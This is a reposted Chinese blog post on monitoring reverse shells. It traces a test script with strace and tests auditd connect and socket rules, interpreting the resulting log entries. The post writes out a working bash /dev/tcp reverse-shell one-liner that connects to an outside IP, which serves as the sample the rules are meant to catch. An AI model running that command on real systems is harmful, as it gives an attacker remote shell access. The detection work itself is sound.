• 反弹shell监控


    转自:http://pirogue.org/2017/07/25/reverse-shell/

    一、跟踪系统调用

    1. strace bash test.sh

    root@Kali:~/pirogue/reverse_shell# strace bash test.sh 
    execve("/bin/bash", ["bash", "test.sh"], [/* 50 vars */]) = 0
    brk(NULL) = 0x7a2000
    access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
    mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fcafdb87000
    access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
    open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=128554, ...}) = 0
    mmap(NULL, 128554, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb67000
    close(3) = 0
    access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
    open("/lib/x86_64-linux-gnu/libtinfo.so.5", O_RDONLY|O_CLOEXEC) = 3
    read(3, "177ELF2113>1260315"..., 832) = 832
    fstat(3, {st_mode=S_IFREG|0644, st_size=170776, ...}) = 0
    mmap(NULL, 2267936, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fcafd73d000
    mprotect(0x7fcafd762000, 2097152, PROT_NONE) = 0
    mmap(0x7fcafd962000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x25000) = 0x7fcafd962000
    close(3) = 0
    access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
    open("/lib/x86_64-linux-gnu/libdl.so.2", O_RDONLY|O_CLOEXEC) = 3
    read(3, "177ELF2113>1200 "..., 832) = 832
    fstat(3, {st_mode=S_IFREG|0644, st_size=14640, ...}) = 0
    mmap(NULL, 2109680, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fcafd539000
    mprotect(0x7fcafd53c000, 2093056, PROT_NONE) = 0
    mmap(0x7fcafd73b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7fcafd73b000
    close(3) = 0
    access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
    open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
    read(3, "177ELF21133>132032"..., 832) = 832
    fstat(3, {st_mode=S_IFREG|0755, st_size=1689360, ...}) = 0
    mmap(NULL, 3795360, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fcafd19a000
    mprotect(0x7fcafd32f000, 2097152, PROT_NONE) = 0
    mmap(0x7fcafd52f000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x195000) = 0x7fcafd52f000
    mmap(0x7fcafd535000, 14752, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fcafd535000
    close(3) = 0
    mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fcafdb65000
    arch_prctl(ARCH_SET_FS, 0x7fcafdb65b40) = 0
    mprotect(0x7fcafd52f000, 16384, PROT_READ) = 0
    mprotect(0x7fcafd73b000, 4096, PROT_READ) = 0
    mprotect(0x7fcafd962000, 16384, PROT_READ) = 0
    mprotect(0x700000, 12288, PROT_READ) = 0
    mprotect(0x7fcafdb8a000, 4096, PROT_READ) = 0
    munmap(0x7fcafdb67000, 128554) = 0
    open("/dev/tty", O_RDWR|O_NONBLOCK) = 3
    close(3) = 0
    brk(NULL) = 0x7a2000
    brk(0x7a3000) = 0x7a3000
    open("/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    brk(0x7a4000) = 0x7a4000
    open("/usr/share/locale/locale.alias", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=2995, ...}) = 0
    brk(0x7a6000) = 0x7a6000
    read(3, "# Locale name alias data base. #"..., 4096) = 2995
    brk(0x7a7000) = 0x7a7000
    brk(0x7a8000) = 0x7a8000
    read(3, "", 4096) = 0
    close(3) = 0
    open("/usr/lib/locale/en_US.UTF-8/LC_IDENTIFICATION", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    open("/usr/lib/locale/en_US.utf8/LC_IDENTIFICATION", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=368, ...}) = 0
    mmap(NULL, 368, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb86000
    close(3) = 0
    open("/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache", O_RDONLY) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=26258, ...}) = 0
    mmap(NULL, 26258, PROT_READ, MAP_SHARED, 3, 0) = 0x7fcafdb7f000
    close(3) = 0
    open("/usr/lib/locale/en_US.UTF-8/LC_MEASUREMENT", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    open("/usr/lib/locale/en_US.utf8/LC_MEASUREMENT", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=23, ...}) = 0
    mmap(NULL, 23, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7e000
    close(3) = 0
    open("/usr/lib/locale/en_US.UTF-8/LC_TELEPHONE", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    open("/usr/lib/locale/en_US.utf8/LC_TELEPHONE", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=59, ...}) = 0
    mmap(NULL, 59, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7d000
    close(3) = 0
    open("/usr/lib/locale/en_US.UTF-8/LC_ADDRESS", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    open("/usr/lib/locale/en_US.utf8/LC_ADDRESS", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=167, ...}) = 0
    mmap(NULL, 167, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7c000
    close(3) = 0
    open("/usr/lib/locale/en_US.UTF-8/LC_NAME", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    open("/usr/lib/locale/en_US.utf8/LC_NAME", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=77, ...}) = 0
    mmap(NULL, 77, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7b000
    close(3) = 0
    open("/usr/lib/locale/en_US.UTF-8/LC_PAPER", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    open("/usr/lib/locale/en_US.utf8/LC_PAPER", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=34, ...}) = 0
    mmap(NULL, 34, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7a000
    close(3) = 0
    open("/usr/lib/locale/en_US.UTF-8/LC_MESSAGES", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    open("/usr/lib/locale/en_US.utf8/LC_MESSAGES", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
    close(3) = 0
    open("/usr/lib/locale/en_US.utf8/LC_MESSAGES/SYS_LC_MESSAGES", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=57, ...}) = 0
    mmap(NULL, 57, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb79000
    close(3) = 0
    open("/usr/lib/locale/en_US.UTF-8/LC_MONETARY", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    open("/usr/lib/locale/en_US.utf8/LC_MONETARY", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=286, ...}) = 0
    mmap(NULL, 286, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb78000
    close(3) = 0
    brk(0x7a9000) = 0x7a9000
    open("/usr/lib/locale/en_US.UTF-8/LC_COLLATE", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    open("/usr/lib/locale/en_US.utf8/LC_COLLATE", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=1244054, ...}) = 0
    mmap(NULL, 1244054, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafda35000
    close(3) = 0
    open("/usr/lib/locale/en_US.UTF-8/LC_TIME", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    open("/usr/lib/locale/en_US.utf8/LC_TIME", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=2454, ...}) = 0
    mmap(NULL, 2454, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb77000
    close(3) = 0
    brk(0x7aa000) = 0x7aa000
    open("/usr/lib/locale/en_US.UTF-8/LC_NUMERIC", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    open("/usr/lib/locale/en_US.utf8/LC_NUMERIC", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=54, ...}) = 0
    mmap(NULL, 54, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb76000
    close(3) = 0
    open("/usr/lib/locale/en_US.UTF-8/LC_CTYPE", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    open("/usr/lib/locale/en_US.utf8/LC_CTYPE", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=328180, ...}) = 0
    mmap(NULL, 328180, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafd9e4000
    close(3) = 0
    brk(0x7ab000) = 0x7ab000
    getuid() = 0
    getgid() = 0
    geteuid() = 0
    getegid() = 0
    rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
    ioctl(-1, TIOCGPGRP, 0x7ffeed7229ac) = -1 EBADF (Bad file descriptor)
    sysinfo({uptime=195741, loads=[21312, 14080, 6432], totalram=4148080640, freeram=202342400, sharedram=510382080, bufferram=24547328, totalswap=2145382400, freeswap=1889628160, procs=584, totalhigh=0, freehigh=0, mem_unit=1}) = 0
    brk(0x7ac000) = 0x7ac000
    rt_sigaction(SIGCHLD, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
    rt_sigaction(SIGCHLD, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, 8) = 0
    rt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
    rt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
    rt_sigaction(SIGQUIT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
    rt_sigaction(SIGQUIT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
    rt_sigaction(SIGTSTP, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
    rt_sigaction(SIGTSTP, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
    rt_sigaction(SIGTTIN, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
    rt_sigaction(SIGTTIN, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
    rt_sigaction(SIGTTOU, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
    rt_sigaction(SIGTTOU, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
    rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
    rt_sigaction(SIGQUIT, {sa_handler=SIG_IGN, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
    uname({sysname="Linux", nodename="Kali", ...}) = 0
    brk(0x7b0000) = 0x7b0000
    brk(0x7b2000) = 0x7b2000
    brk(0x7b4000) = 0x7b4000
    brk(0x7b5000) = 0x7b5000
    brk(0x7b6000) = 0x7b6000
    brk(0x7b7000) = 0x7b7000
    brk(0x7b8000) = 0x7b8000
    stat("/root/pirogue/reverse_shell", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
    stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
    stat("/root", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
    stat("/root/pirogue", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
    stat("/root/pirogue/reverse_shell", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
    stat("/root/pirogue", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
    getpid() = 4833
    brk(0x7b9000) = 0x7b9000
    getppid() = 4831
    stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
    stat("/usr/local/sbin/bash", 0x7ffeed722620) = -1 ENOENT (No such file or directory)
    stat("/usr/local/bin/bash", 0x7ffeed722620) = -1 ENOENT (No such file or directory)
    stat("/usr/sbin/bash", 0x7ffeed722620) = -1 ENOENT (No such file or directory)
    stat("/usr/bin/bash", 0x7ffeed722620) = -1 ENOENT (No such file or directory)
    stat("/sbin/bash", 0x7ffeed722620) = -1 ENOENT (No such file or directory)
    stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
    stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
    geteuid() = 0
    getegid() = 0
    getuid() = 0
    getgid() = 0
    access("/bin/bash", X_OK) = 0
    stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
    geteuid() = 0
    getegid() = 0
    getuid() = 0
    getgid() = 0
    access("/bin/bash", R_OK) = 0
    stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
    stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
    geteuid() = 0
    getegid() = 0
    getuid() = 0
    getgid() = 0
    access("/bin/bash", X_OK) = 0
    stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
    geteuid() = 0
    getegid() = 0
    getuid() = 0
    getgid() = 0
    access("/bin/bash", R_OK) = 0
    getpid() = 4833
    brk(0x7ba000) = 0x7ba000
    brk(0x7bb000) = 0x7bb000
    getpgrp() = 4831
    ioctl(2, TIOCGPGRP, [4831]) = 0
    rt_sigaction(SIGCHLD, {sa_handler=0x44cf90, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, 8) = 0
    getrlimit(RLIMIT_NPROC, {rlim_cur=15710, rlim_max=15710}) = 0
    brk(0x7bc000) = 0x7bc000
    brk(0x7bd000) = 0x7bd000
    rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
    brk(0x7be000) = 0x7be000
    open("test.sh", O_RDONLY) = 3
    stat("test.sh", {st_mode=S_IFREG|0644, st_size=73, ...}) = 0
    ioctl(3, TCGETS, 0x7ffeed722940) = -1 ENOTTY (Inappropriate ioctl for device)
    lseek(3, 0, SEEK_CUR) = 0
    read(3, "exec 9<> /dev/tcp/130.182.116.111"..., 80) = 73
    lseek(3, 0, SEEK_SET) = 0
    getrlimit(RLIMIT_NOFILE, {rlim_cur=1024, rlim_max=4*1024}) = 0
    fcntl(255, F_GETFD) = -1 EBADF (Bad file descriptor)
    dup2(3, 255) = 255
    close(3) = 0
    fcntl(255, F_SETFD, FD_CLOEXEC) = 0
    fcntl(255, F_GETFL) = 0x8000 (flags O_RDONLY|O_LARGEFILE)
    fstat(255, {st_mode=S_IFREG|0644, st_size=73, ...}) = 0
    lseek(255, 0, SEEK_CUR) = 0
    brk(0x7bf000) = 0x7bf000
    read(255, "exec 9<> /dev/tcp/130.182.116.111"..., 73) = 73
    brk(0x7c0000) = 0x7c0000
    socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
    connect(3, {sa_family=AF_INET, sin_port=htons(2323), sin_addr=inet_addr("130.182.116.111")}, 16) = 0
    fcntl(9, F_GETFD) = -1 EBADF (Bad file descriptor)
    dup2(3, 9) = 9
    close(3) = 0
    fcntl(0, F_GETFD) = 0
    fcntl(0, F_DUPFD, 10) = 10
    fcntl(0, F_GETFD) = 0
    fcntl(10, F_SETFD, FD_CLOEXEC) = 0
    dup2(9, 0) = 0
    fcntl(9, F_GETFD) = 0
    close(10) = 0
    fcntl(1, F_GETFD) = 0
    fcntl(1, F_DUPFD, 10) = 10
    fcntl(1, F_GETFD) = 0
    fcntl(10, F_SETFD, FD_CLOEXEC) = 0
    dup2(9, 1) = 1
    fcntl(9, F_GETFD) = 0
    fcntl(2, F_GETFD) = 0
    fcntl(2, F_DUPFD, 10) = 11
    fcntl(2, F_GETFD) = 0
    fcntl(11, F_SETFD, FD_CLOEXEC) = 0
    dup2(1, 2) = 2
    fcntl(1, F_GETFD) = 0
    close(11) = 0
    close(10) = 0
    brk(0x7c1000) = 0x7c1000
    rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
    clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7fcafdb65e10) = 4834
    rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
    rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
    rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
    rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
    rt_sigaction(SIGINT, {sa_handler=0x449930, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
    wait4(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], 0, NULL) = 4834
    rt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=0x449930, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
    rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
    --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=4834, si_uid=0, si_status=127, si_utime=0, si_stime=0} ---
    wait4(-1, 0x7ffeed722010, WNOHANG, NULL) = -1 ECHILD (No child processes)
    rt_sigreturn({mask=[]}) = 0
    read(255, "", 73) = 0
    rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
    rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
    exit_group(127) = ?
    +++ exited with 127 +++

    2. strace -c bash test.sh

    reverse-shell

    二、audit监控分析

    1. audit相关资料

    2. 测试audit监控规则

    auditctl -A exit,always -S connect
    auditctl -a exit,always -F arch=b64 -F a0=2 -F a1=1 -S socket -k CONNECTION
    auditctl -a exit,always -F arch=b64 -S connect

    1) auditctl -a exit,always -F arch=b64 -S connect

    root@Kali:~/pirogue/reverse_shell# auditctl -l
    -a always,exit -F arch=b64 -S connect

    回显:

    tailf /var/log/audit/audit.log

    type=CONFIG_CHANGE msg=audit(1500974819.373:24): auid=0 ses=3 op="add_rule" key=(null) list=4 res=1
    • bash test.sh

    回显(saddr 字段是原始 sockaddr 结构的十六进制编码,可用 ausearch -i 解析成可读的地址和端口):

    tailf /var/log/audit/audit.log

    type=SYSCALL msg=audit(1500975246.989:30): arch=c000003e syscall=42 success=yes exit=0 a0=3 a1=1c052b8 a2=10 a3=129 items=0 ppid=4722 pid=7736 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="bash" exe="/bin/bash" key=(null)
    type=SOCKADDR msg=audit(1500975246.989:30): saddr=0200091385827E520000000000000000
    type=PROCTITLE msg=audit(1500975246.989:30): proctitle=6261736800746573742E7368
    • exec 9<> /dev/tcp/130.182.116.111/2323;exec 0<&9;exec 1>&9 2>&1;/bin/bash

    直接执行反弹命令时,并没有 audit 到网络连接行为。但在反弹 shell 中执行 whoami 时出现了回显。注意下面这些记录 success=no exit=-2(ENOENT),PATH 项解析出的目标是本机的 /var/run/nscd/socket,也就是 whoami 查询用户名时对 nscd 本地 Unix 套接字的 connect,并不是外连网络行为:

    type=SYSCALL msg=audit(1500975460.957:49): arch=c000003e syscall=42 success=no exit=-2 a0=3 a1=7ffe9c798490 a2=6e a3=6 items=1 ppid=7771 pid=7775 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="whoami" exe="/usr/bin/whoami" key=(null)
    type=SOCKADDR msg=audit(1500975460.957:49): saddr=01002F7661722F72756E2F6E7363642F736F636B657400000000000000000000E029ECE3CD550000002CECE3CD55000000000000000000004B389E12077F00008028ECE3CD55000080988C12077F00001C000000000000004073C312077F0000F386799CFE7F0000100000000000
    type=CWD msg=audit(1500975460.957:49): cwd="/root"
    type=PATH msg=audit(1500975460.957:49): item=0 name="/var/run/nscd/socket" nametype=UNKNOWN
    type=PROCTITLE msg=audit(1500975460.957:49): proctitle="whoami"
    type=SYSCALL msg=audit(1500975460.961:50): arch=c000003e syscall=42 success=no exit=-2 a0=3 a1=7ffe9c798640 a2=6e a3=6 items=1 ppid=7771 pid=7775 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="whoami" exe="/usr/bin/whoami" key=(null)
    type=SOCKADDR msg=audit(1500975460.961:50): saddr=01002F7661722F72756E2F6E7363642F736F636B65740000109AE512077F000001000000000000000000000000000000C887799CFE7F0000D120C412077F00000100000000000000109AE512077F0000010000000000000000000000000000000100000000000000000000000000
    type=CWD msg=audit(1500975460.961:50): cwd="/root"
    type=PATH msg=audit(1500975460.961:50): item=0 name="/var/run/nscd/socket" nametype=UNKNOWN
    type=PROCTITLE msg=audit(1500975460.961:50): proctitle="whoami"

    2) auditctl -a always,exit -F arch=b64 -S socket

    type=SYSCALL msg=audit(1500976257.753:113): arch=c000003e syscall=41 success=yes exit=3 a0=2 a1=1 a2=6 a3=2b items=0 ppid=2409 pid=7894 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="bash" exe="/bin/bash" key=(null)
    type=PROCTITLE msg=audit(1500976257.753:113): proctitle="/usr/lib/gnome-terminal/gnome-terminal-server"

    执行反弹命令后直接监控到如上日志(syscall=41 即 socket,a0=2 为 AF_INET,a1=1 为 SOCK_STREAM,a2=6 为 TCP)。输入 whoami 也能看到回显,不过这些记录的 a0=1 是 AF_UNIX 本地套接字,并非网络连接;前面带 -F a0=2 -F a1=1 过滤条件的规则可以排除这类噪音。另外注意 -F a1=1 是精确匹配,像 whoami 这样 a1=80801(type 带了额外标志位)的 socket 调用不会命中该规则:

    type=SYSCALL msg=audit(1500976407.153:125): arch=c000003e syscall=41 success=yes exit=3 a0=1 a1=80801 a2=0 a3=6 items=0 ppid=7923 pid=7956 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="whoami" exe="/usr/bin/whoami" key=(null)
    type=PROCTITLE msg=audit(1500976407.153:125): proctitle="whoami"
    type=SYSCALL msg=audit(1500976407.153:126): arch=c000003e syscall=41 success=yes exit=3 a0=1 a1=80801 a2=0 a3=6 items=0 ppid=7923 pid=7956 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="whoami" exe="/usr/bin/whoami" key=(null)
    type=PROCTITLE msg=audit(1500976407.153:126): proctitle="whoami"

    待续…

  • 原文地址:https://www.cnblogs.com/0day5/p/8280400.html